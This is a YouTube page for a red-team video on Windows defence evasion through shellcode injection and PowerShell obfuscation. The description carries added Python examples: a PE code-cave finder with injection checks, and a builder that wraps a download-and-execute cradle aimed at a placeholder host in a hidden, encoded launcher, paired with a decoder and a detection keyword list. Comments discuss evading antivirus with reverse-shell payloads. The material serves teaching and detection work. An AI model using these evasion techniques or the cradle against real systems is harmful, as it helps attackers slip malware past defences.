Windows Red Team - Dynamic Shellcode Injection & PowerShell Obfuscation

25,874 views

HackerSploit

1 year ago

In this video, I will be exploring the process of dynamically injecting Shellcode into portable executables and PowerShell obfuscation for the purpose of defense evasion on Windows.
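An added example (not code from the video and not Shellter's code; Shellter chooses its injection point by tracing the target's execution, which this script does not do): the static side of injecting shellcode into a portable executable, namely walking the PE section table to find code caves (runs of NUL padding inside a section), plus the header-level tells a defender can check for on a binary suspected of in-place injection. The PE bytes are constructed inline so the script runs offline; they are not a real program.

```python
"""Code-cave discovery in a PE section table, plus the defender's checks on the result.

Added example, not HackerSploit's or Shellter's code. The sample PE is constructed
inline (two sections, 60 bytes of "code", the rest NUL padding) and is not a real program.
"""
import struct

SECTION_HDR = "<8sIIIIIIHHI"      # IMAGE_SECTION_HEADER, 40 bytes
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def _header_offsets(pe):
    """Return (optional header offset, SizeOfOptionalHeader, NumberOfSections)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER follows the signature
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    return coff + 20, size_opt, num_sections


def parse_sections(pe):
    """Return (AddressOfEntryPoint, [section dicts]); the layout is shared by PE32 and PE32+."""
    opt, size_opt, n = _header_offsets(pe)
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]   # same offset in both optional headers
    sections = []
    for i in range(n):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, pe, opt + size_opt + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode(), "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return entry_rva, sections


def find_caves(pe, min_size=64):
    """Longest run of NUL bytes in each section's raw data: the classic code cave."""
    _, sections = parse_sections(pe)
    caves = []
    for s in sections:
        data = pe[s["rawptr"]:s["rawptr"] + s["rawsize"]]
        best, best_start, run, run_start = 0, 0, 0, 0
        for i, b in enumerate(data):
            if b == 0:
                if run == 0:
                    run_start = i
                run += 1
                if run > best:
                    best, best_start = run, run_start
            else:
                run = 0
        if best >= min_size:
            caves.append({"section": s["name"], "file_offset": s["rawptr"] + best_start,
                          "rva": s["vaddr"] + best_start, "size": best,
                          "executable": bool(s["chars"] & IMAGE_SCN_MEM_EXECUTE)})
    return caves


def injection_indicators(pe):
    """Cheap static tells: a writable+executable section, or an entry point outside the first code section."""
    entry_rva, sections = parse_sections(pe)
    first_exec = next((s["name"] for s in sections if s["chars"] & IMAGE_SCN_MEM_EXECUTE), None)
    findings = []
    for s in sections:
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {s['name']} is writable and executable")
        span = max(s["vsize"], s["rawsize"])             # approximation of the mapped extent
        if s["vaddr"] <= entry_rva < s["vaddr"] + span and s["name"] != first_exec:
            findings.append(f"entry point 0x{entry_rva:x} is in {s['name']}, not {first_exec}")
    return findings


def patch_headers(pe, section_name, new_chars, new_entry_rva):
    """Header-only edit reproducing a careless injector's side effects; no shellcode is written."""
    buf = bytearray(pe)
    opt, size_opt, n = _header_offsets(buf)
    struct.pack_into("<I", buf, opt + 16, new_entry_rva)
    for i in range(n):
        off = opt + size_opt + i * 40
        if bytes(buf[off:off + 8]).rstrip(b"\0") == section_name.encode():
            struct.pack_into("<I", buf, off + 36, new_chars)   # Characteristics field
    return bytes(buf)


def build_sample_pe():
    """Constructed two-section PE32 image: .text has 60 bytes of code, then a 452-byte cave."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew
    opt = bytearray(224)                                    # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                   # Magic = PE32
    struct.pack_into("<I", opt, 16, 0x1000)                 # AddressOfEntryPoint -> .text
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)
    text_hdr = struct.pack(SECTION_HDR, b".text", 0x1F0, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    data_hdr = struct.pack(SECTION_HDR, b".data", 0x100, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text_hdr + data_hdr).ljust(0x200, b"\0")
    text = (b"\x55\x89\xE5" * 20).ljust(0x200, b"\0")      # push ebp; mov ebp,esp x20, then NUL padding
    data = b"\x41" * 0x200                                  # fully used, no cave
    return headers + text + data


if __name__ == "__main__":
    clean = build_sample_pe()
    print("caves:", find_caves(clean))
    print("indicators (clean):", injection_indicators(clean))
    tampered = patch_headers(clean, ".data", 0xE0000040, 0x2000)   # .data made RWX, entry moved into it
    print("indicators (tampered):", injection_indicators(tampered))
```

The cave finder is what a simple injector needs; the indicator function is the check to run over a suspect binary before trusting it. Shellter-style injection into an existing .text section at a traced execution point leaves neither tell, which is why the comments below report that Defender's behavioural detection, not a header check, is what catches it.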
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.
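An added example, not the video's code and not Invoke-Obfuscation's algorithm: the two layers most PowerShell obfuscators stack (splitting string literals, then wrapping the script in `-EncodedCommand`) and the decoder a detection engineer writes to peel them back off a process command line taken from a 4688 or Sysmon event 1 record. The sample cradle script and the placeholder host `example.invalid` are constructed. Caveat a practitioner should keep in mind: these layers only beat signature matching on the command line; PowerShell Script Block Logging (event 4104) and AMSI see the script after PowerShell has decoded it.

```python
"""Two PowerShell obfuscation layers and the decoder that peels them.

Added example (not the video's code, not Invoke-Obfuscation's algorithm).
Offense: string splitting, then -EncodedCommand (base64 over UTF-16LE).
Defense: normalise a logged command line back to plain text and flag cradle keywords.
The sample script and its host are constructed.
"""
import base64
import re

# Constructed download cradle; example.invalid is a reserved, non-resolving name.
SAMPLE_SCRIPT = 'IEX (New-Object "Net.WebClient").DownloadString("http://example.invalid/a.ps1")'
SUSPICIOUS = ("DownloadString", "IEX", "Invoke-Expression", "FromBase64String",
              "Net.WebClient", "VirtualAlloc")


def split_string_literals(script, chunk=4):
    """Rewrite every "literal" as ('lite'+'ral') so no signature sees the whole word."""
    def repl(m):
        s = m.group(1)
        parts = [s[i:i + chunk] for i in range(0, len(s), chunk)]
        return "(" + "+".join(f"'{p}'" for p in parts) + ")"
    return re.sub(r'"([^"]*)"', repl, script)


def encode_command(script):
    """Build the -EncodedCommand argument exactly as powershell.exe expects it (UTF-16LE, no BOM)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def build_launcher(script):
    """A hidden-window launcher with both layers applied."""
    return "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_command(
        split_string_literals(script))


# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common short forms.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CONCAT_RE = re.compile(r"\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)")


def join_concats(script):
    """Collapse ('a'+'b'+'c') back into 'abc'."""
    return CONCAT_RE.sub(
        lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'", script)


def deobfuscate(cmdline, max_layers=5):
    """Peel nested -EncodedCommand layers, drop backtick escapes, rejoin split strings.

    This is a normaliser for matching, not an interpreter: it also strips a legitimate
    backtick escape inside a double-quoted string, which is acceptable for detection.
    """
    text = cmdline
    for _ in range(max_layers):                       # bounded: attackers nest encoders
        m = ENC_RE.search(text)
        if not m:
            break
        try:
            text = base64.b64decode(m.group(1)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):      # not base64/UTF-16 after all: keep what we have
            break
    return join_concats(text.replace("`", ""))


def suspicious_tokens(script):
    """Case-insensitive keyword hits on the normalised script."""
    low = script.lower()
    return [t for t in SUSPICIOUS if t.lower() in low]


if __name__ == "__main__":
    launcher = build_launcher(SAMPLE_SCRIPT)
    print(launcher)                                   # nothing readable on the command line
    plain = deobfuscate(launcher)
    print(plain)
    print(suspicious_tokens(plain))
```

Run the block and compare the launcher line with the decoded one: every keyword a command-line signature would key on is gone from the first and back in the second. Match your rules against the output of `deobfuscate`, not against the raw command line, and collect 4104 events as well, since the script block PowerShell logs there is already the decoded form.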
Writeup: hackersploit.org/windows-red-...
#redteaming #cybersecurity #pentesting

Comments: 63

@RealCyberCrime 1 year ago
You're killing it with this content, HackerSploit, please upload more!! I've only seen a few of the red team videos but will definitely be watching more.

@fabricenade9982 1 year ago
HackerSploit's videos are always a masterclass 💪. The explanations are perfectly clear. Just MASTERCLASS.

@baidysall9591 1 year ago
Awesome video. Always providing great content. Merry Christmas 🎉

@ilbona87 1 year ago
I recently finished the PTSv2 course, you're a phenomenal teacher!

@Nikita-sj8og 1 year ago
Can you please give the link to it?

@ilbona87 1 year ago
@Nikita-sj8og It's hosted on the INE platform; you need to purchase at least a monthly subscription to take the course.

@ragnarok55 1 year ago
Where can you take that course? Is he an INE platform instructor or not?

@torsec6048 1 year ago
Happy to see you after a long time.

@korovamilkplus 1 year ago
Alexis, first of all I want to thank you for this fantastic Red Team Fundamentals course! I've done some testing, and unfortunately, despite the video being recent, almost none of the AV evasion techniques work:
1) Invoke-Obfuscation is the only technique that works.
2) Shellter is immediately detected, both with new versions of WinRAR (32-bit) and with older versions.
3) Shikata Ga Nai is not detected by Windows Defender using 45 iterations, but the listener does not receive the reverse connection. I tried Shikata Ga Nai with different payloads created with msfvenom, and with different iterations, but either it is detected or it does not make the reverse connection.
4) In no case was I able to obfuscate a reverse shell created with msfvenom.
The tests were all conducted with Windows Defender on Windows 10 (64-bit) in my lab. If you have the time and the desire, you could update the obfuscation techniques, perhaps by going deeper into the topic. In any case, thanks as always, you're the best cybersecurity teacher. See you soon.

@korovamilkplus 1 year ago
UPDATE: Invoke-Obfuscation also works with PowerShell Empire (the CSharp payload is not detected). Unfortunately, the /powershell/privesc/bypassuac module does not work with PowerShell Empire (it is detected, both with and without obfuscation), despite working perfectly with Metasploit.

@DopeForJesus 1 year ago
This is top-notch material.

@kmengkomsot1479 1 year ago
Thank you, HackerSploit 😍😍

@zarandija 1 year ago
15:56 You are fantastic... great video!!!!!

@parkour.11parkour58 1 year ago
Gonna watch all your videos and comment after watching them.

@hackproof1 1 year ago
Finally... welcome back.

@jamesparker5776 1 year ago
Good to see you, sir.
@NightMaRe-xl9tr 1 year ago
Best hacking content ever 👍💯, keep up the good work.

@byronshepherd8415 1 year ago
Welcome back!

@Funnnnboyy 1 year ago
Welcome back 🎉

@arupsen121 1 year ago
After a long time you came back with a video. Alex, my favourite mentor. Can I request any video topics?

@netstreamer 11 months ago
These videos are great! One question though: even if you evade the AV, won't the continuously running command prompt window in the background tip the blue team off?

@mynealways509 1 year ago
Pretty hard to keep a good man down... Welcome back, HS...

@HCKP 11 months ago
I am a big fan of youuuuuu

@gianlucasanfilippo4669 11 months ago
Great video. But I have a question: following all the steps, I get the infected WinRAR executable, but in my case Windows Defender then detects it when I just pass it to the victim target. How can I avoid it? Thanks

@greyhatsecurity 1 year ago
Yaaaay!!!!! It's been a while.

@ajoyjohn1487 1 year ago
Best video.

@onlinewebsites3476 1 year ago
Yo, finally!

@rishabhrana3773 1 year ago
Welcome back, sir.

@HackerSploit 1 year ago
Return of the Mack! Good to be back.

@rishabhrana3773 1 year ago
@HackerSploit Yes sir, today I was watching your video while thinking about a new video.

@Tathamet 1 year ago
Awesome, thanks! But most EDRs today are really good at stopping Shellter, from my experience.

@GliddingHippo 1 year ago
Can you help me? I can't install PowerShell, it says "Package 'powershell' has no installation candidate".

@rishabhrana3773 1 year ago
As usual, great video. How many videos will come in this series?

@HackerSploit 1 year ago
Will share the outline in a separate video/live stream.

@jordanyoung1836 1 year ago
Hi... I'm Jordan and I'm new to the channel.

@xsTaoo 1 year ago
Entering "sudo wine shellter.exe" prompts "wine: could not load kernel32.dll, status c0000135". What should I do?
@passaronegro349 1 year ago
We follow your channel here in Brazil 🇧🇷✨. If possible, put subtitles in your videos!!!!

@daljeetbhati8353 1 year ago
Is this part of the Red Team Fundamentals series?

@torsec6048 1 year ago
Long time no see, Alexis.

@user-vu6fy6jm9r 8 months ago
My regards, brother! Is it possible to recover some photos that I had sent via Messenger from a Facebook account that I deleted at the beginning of the year? Were they automatically deleted from the inbox of the person I sent them to when my account was deleted?

@r.e.d2016 1 year ago
Hello HackerSploit. Can you help me? I am interested in cybersecurity. Which books can you recommend to me? Which books should I read?

@alwan7777 1 year ago
Please review HavocFramework.

@jordanyoung1836 1 year ago
How is it going?

@ragnarok55 1 year ago
My request: please kindly explain ISO 27001, because every cybersecurity job asks for it.

@harshgupta1911 1 year ago
Hello sir, I am from India 🙏🏻. Please, would you help me with how I should start my journey in the cybersec field?

@RealCyberCrime 1 year ago
I work as a blue teamer at my job, but love seeing the other side of the fence. You will not evade my defenses >:)

@HackerSploit 1 year ago
I can try :)

@16saalkanigga 1 year ago
**Video idea** Show some offensive examples of ChatGPT. How can pentesters use it? How will it affect the cybersecurity field? Will AI take cybersecurity jobs in the near future?

@YoutubePremiumBot 1 year ago
Let me come in the top 10.

@sureshk9297 1 year ago
Hi bro, my laptop was hacked, please help me.

@jordanyoung1836 1 year ago
🙂🙂🙂

@dameonjensen 1 year ago
Where in the hell is the link, my man?

@PetritK10 1 year ago
Where are the web pentesting videos? :D

@ahmedsahaladamhassan8508 1 year ago
Did you stop the web app series, sir?

@kasta851984 1 year ago
Great video. I've tried to do the same, but my antivirus detected this and blocked it.

@PolrisTired 1 year ago
Yeah, it seems to work on Windows Defender, but many modern AVs are sophisticated enough to pick up on simple cases like these.

@vinayjain322 1 year ago
Yeah, I'm first 🥇🥇🥇🥇🥇😃😃😃

@techzon4456 1 year ago
Please make videos on web app hacking.

@HackerSploit 1 year ago
Your wish is my command.

@techzon4456 1 year ago
Thank you sir...... It means a lot.

@firosiam7786 1 year ago
Guess the web app series got pushed back.

@sethp9509 1 year ago
7th?

@danielraviv6507 1 year ago
Detected by AV...